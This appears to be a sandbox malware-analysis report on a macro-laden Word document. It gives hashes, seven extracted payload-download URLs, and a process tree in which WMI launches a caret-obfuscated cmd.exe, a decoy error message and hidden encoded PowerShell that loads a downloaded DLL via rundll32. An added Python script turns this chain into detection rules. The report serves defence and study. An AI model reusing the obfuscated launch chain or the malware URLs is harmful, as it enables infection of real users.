Analysis
max time kernel: 139s
max time network: 134s
platform: windows10_x64
resource: win10v20201028
submitted: 13-01-2021 11:54
Static task: static1
Behavioral task: behavioral1 (sample Archivo 2020-R7352.doc, resource win7v20201028)
Behavioral task: behavioral2 (sample Archivo 2020-R7352.doc, resource win10v20201028)
General
Target: Archivo 2020-R7352.doc
Size: 159KB
MD5: b1c051ba9d0d7843ab2d42babb2b92d1
SHA1: 90cb16b7cacb0536a6ca8fdea2da8cdb6be86ff1
SHA256: 2e5599c71028de6a5c1202946484ff5020f38bb282b78e69aade9c840c3e2f24
SHA512: e9d304415157b1760c55e8784621396482908668905eebaf389959693725ba61397064f5fc21b31d8eb1cbbab64d88efa6232cba743f34d90dd1c7dd71ba7b4b
Malware Config
Extracted
https://familylifetruth.com/cgi-bin/PPq7/
https://coshou.com/wp-admin/EM/
https://www.todoensaludips.com/wp-includes/9/
https://dieuhoaxanh.vn/wp-admin/a/
http://cahyaproperty.bbtbatam.com/mhD/
http://depannage-vehicule-maroc.com/wp-admin/c/
https://techworldo.com/cgi-bin/gcZ/
Signatures
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro. Here the parent is the WMI provider host (wmiprvse.exe) rather than WINWORD.EXE, which is consistent with the macro launching the command through WMI so that cmd.exe does not appear as a direct child of Word; detections keyed only on Office-to-shell parent/child pairs miss this.
Processes:
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 188 | 2128 | cmd.exe |
Blocklisted process makes network request (4 IoCs)
Processes:
flow | pid | process
20 | 2260 | powershell.exe
23 | 2260 | powershell.exe
31 | 2260 | powershell.exe
33 | 2260 | powershell.exe
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments. WINWORD.EXE also reads these keys during normal startup, so on its own this is a weak indicator.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes:
pid | process
3336 | WINWORD.EXE
3336 | WINWORD.EXE
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
pid | process
2260 | powershell.exe
2260 | powershell.exe
2260 | powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
description | pid | process
Token: SeDebugPrivilege | 2260 | powershell.exe
Suspicious use of SetWindowsHookEx (7 IoCs)
Processes:
pid | process
3336 | WINWORD.EXE
3336 | WINWORD.EXE
3336 | WINWORD.EXE
3336 | WINWORD.EXE
3336 | WINWORD.EXE
3336 | WINWORD.EXE
3336 | WINWORD.EXE
Suspicious use of WriteProcessMemory (6 IoCs)
Processes:
description | pid | process | target process
PID 188 wrote to memory of 2800 | 188 | cmd.exe | msg.exe
PID 188 wrote to memory of 2800 | 188 | cmd.exe | msg.exe
PID 188 wrote to memory of 2260 | 188 | cmd.exe | powershell.exe
PID 188 wrote to memory of 2260 | 188 | cmd.exe | powershell.exe
PID 2260 wrote to memory of 1776 | 2260 | powershell.exe | rundll32.exe
PID 2260 wrote to memory of 1776 | 2260 | powershell.exe | rundll32.exe
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (pid 3336)
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Archivo 2020-R7352.doc" /o ""
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
C:\Windows\system32\cmd.exe (pid 188)
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\msg.exe (pid 2800)
        msg Admin /v Word experienced an error trying to open the file.
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (pid 2260)
        POwersheLL -w hidden -ENCOD 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
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\rundll32.exe (pid 1776)
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Rr1sj9a\Bcx4iay\K_9O.dll,Control_RunDLL

Reading the chain: WINWORD.EXE opens the document, and cmd.exe (pid 188) is then started with the WMI provider host, not Word, as its parent (see the "Process spawned unexpected child process" signature), the effect of the macro launching the command through WMI. The repeated "cmd cmd cmd cmd /c" prefix and the carets in P^Ow^er^she^L^L only obfuscate the command line: cmd.exe strips carets before execution, so the child actually runs "POwersheLL -w hidden -ENCOD ...", exactly as its own command line shows, and powershell.exe resolves the unambiguous prefix -ENCOD to -EncodedCommand. msg.exe shows the user a decoy "Word experienced an error trying to open the file." dialog while powershell.exe (pid 2260) makes its network requests (flows 20, 23, 31 and 33) and then launches rundll32.exe against K_9O.dll under the user profile through the DLL's Control_RunDLL export.
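The Python below is an added example, not code from the sandbox or from this page. It turns the three behaviours recorded above (a shell started under the WMI provider host, a caret-obfuscated hidden encoded PowerShell launch, and rundll32.exe loading a DLL from the user profile) into detection rules and runs them over constructed process-creation events that mirror the report's process tree. The event field names, the explorer.exe parent assumed for WINWORD.EXE, and the base64 placeholder standing in for the elided encoded command are assumptions and not taken from the report.

```python
"""Detection rules for the process chain in this report (added example).

The EVENTS below are constructed to mirror the report's process tree; the
field names are not any particular EDR or Sysmon schema, WINWORD's parent is
assumed, and the base64 blob is a placeholder, not the sample's real payload.
"""
import re

# Constructed process-creation events (not a real log).
EVENTS = [
    {"pid": 3336, "ppid": 4000, "parent_image": "explorer.exe",   # parent assumed
     "image": "WINWORD.EXE",
     "cmdline": '"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE" /n '
                '"C:\\Users\\Admin\\AppData\\Local\\Temp\\Archivo 2020-R7352.doc" /o ""'},
    {"pid": 188, "ppid": 2128, "parent_image": "wmiprvse.exe", "image": "cmd.exe",
     "cmdline": "cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying "
                "to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD "
                "UABsAGEAYwBlAGgAbwBsAGQAZQByAA=="},                 # placeholder payload
    {"pid": 2800, "ppid": 188, "parent_image": "cmd.exe", "image": "msg.exe",
     "cmdline": "msg Admin /v Word experienced an error trying to open the file."},
    {"pid": 2260, "ppid": 188, "parent_image": "cmd.exe", "image": "powershell.exe",
     "cmdline": "POwersheLL -w hidden -ENCOD UABsAGEAYwBlAGgAbwBsAGQAZQByAA=="},
    {"pid": 1776, "ppid": 2260, "parent_image": "powershell.exe", "image": "rundll32.exe",
     "cmdline": '"C:\\Windows\\system32\\rundll32.exe" '
                'C:\\Users\\Admin\\Rr1sj9a\\Bcx4iay\\K_9O.dll,Control_RunDLL'},
]

# Parents that should not start a shell or script host directly: Office apps, and
# the WMI provider host the macro can use to detach cmd.exe from WINWORD.EXE.
SUSPECT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "wmiprvse.exe"}
SHELL_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_DLL = re.compile(r'(?i)[a-z]:\\users\\[^\s",]+\.dll')   # DLL path under C:\Users\


def strip_cmd_escapes(cmdline):
    """Undo cmd.exe caret escaping (^x -> x), so P^Ow^er^she^L^L becomes POwersheLL."""
    return re.sub(r"\^(.)", r"\1", cmdline, flags=re.S)


def is_powershell_token(tok):
    """True for powershell / powershell.exe, bare or with any directory prefix."""
    return re.fullmatch(r"(?i)(?:.*[\\/])?powershell(?:\.exe)?", tok.strip('"')) is not None


def powershell_flags(cmdline):
    """Return the subset of {'hidden', 'encoded'} present after the powershell token.

    powershell.exe accepts any unambiguous prefix of a parameter name, so
    -w/-win/-windowstyle and -e/-ec/-enc/-encod/-encodedcommand all count.
    """
    toks = strip_cmd_escapes(cmdline).split()
    flags = set()
    for i, tok in enumerate(toks):
        if not is_powershell_token(tok):
            continue
        rest = [t.lower() for t in toks[i + 1:]]
        for j, t in enumerate(rest):
            if t in ("-e", "-ec") or (len(t) >= 3 and "-encodedcommand".startswith(t)):
                flags.add("encoded")
            if (len(t) >= 2 and "-windowstyle".startswith(t)
                    and j + 1 < len(rest) and rest[j + 1] == "hidden"):
                flags.add("hidden")
        break
    return flags


def analyze(events):
    """Apply all rules to every event; return sorted (pid, rule) findings."""
    findings = set()
    for ev in events:
        image, parent, cmd = ev["image"].lower(), ev["parent_image"].lower(), ev["cmdline"]
        if parent in SUSPECT_PARENTS and image in SHELL_HOSTS:
            findings.add((ev["pid"], "unexpected_child"))
        raw_ps = any(is_powershell_token(t) for t in cmd.split())
        norm_ps = any(is_powershell_token(t) for t in strip_cmd_escapes(cmd).split())
        if norm_ps and not raw_ps:            # only visible once carets are removed
            findings.add((ev["pid"], "caret_obfuscated_powershell"))
        if powershell_flags(cmd) >= {"hidden", "encoded"}:
            findings.add((ev["pid"], "hidden_encoded_powershell"))
        if image == "rundll32.exe" and USER_DLL.search(cmd):
            findings.add((ev["pid"], "rundll32_user_profile_dll"))
    return sorted(findings)


if __name__ == "__main__":
    for pid, rule in analyze(EVENTS):
        print(pid, rule)
```

Matching the parent/child pair rather than only WINWORD.EXE's children is what catches the WMI detour, and normalising carets before looking for the PowerShell token is what catches the launch on the cmd.exe command line as well as on the child's; both pid 188 and pid 2260 fire the hidden-encoded rule, while msg.exe and WINWORD.EXE stay quiet.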
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\Rr1sj9a\Bcx4iay\K_9O.dll (the DLL that powershell.exe, pid 2260, handed to rundll32.exe, pid 1776, via Control_RunDLL)
MD5: c4bb6db0a01f8e518a6fd0b5b7bf7f9d
SHA1: 877c4c0d6ce8ff84de94accdecdcdaf977fb7f02
SHA256: d994d7a09a15f70918bd707abd21a9cdaa93d3938972ebb6c98130b40fa9add2
SHA512: 0faf908ffb8eefffebd15e2d7e38833ecc2f2b136959886d3ec9f8ccdb92c5d5f6b391c54f481399c78219a4e9b0d7641e49c75c2ed00a9ab141b01d1acf583f
memory/1776-8-0x0000000000000000-mapping.dmp
memory/2260-4-0x0000000000000000-mapping.dmp
memory/2260-5-0x00007FFD7DF90000-0x00007FFD7E97C000-memory.dmp (filesize 9.9MB)
memory/2260-6-0x000002E270350000-0x000002E270351000-memory.dmp (filesize 4KB)
memory/2260-7-0x000002E270530000-0x000002E270531000-memory.dmp (filesize 4KB)
memory/2800-3-0x0000000000000000-mapping.dmp
memory/3336-2-0x00007FFD84C50000-0x00007FFD85287000-memory.dmp (filesize 6.2MB)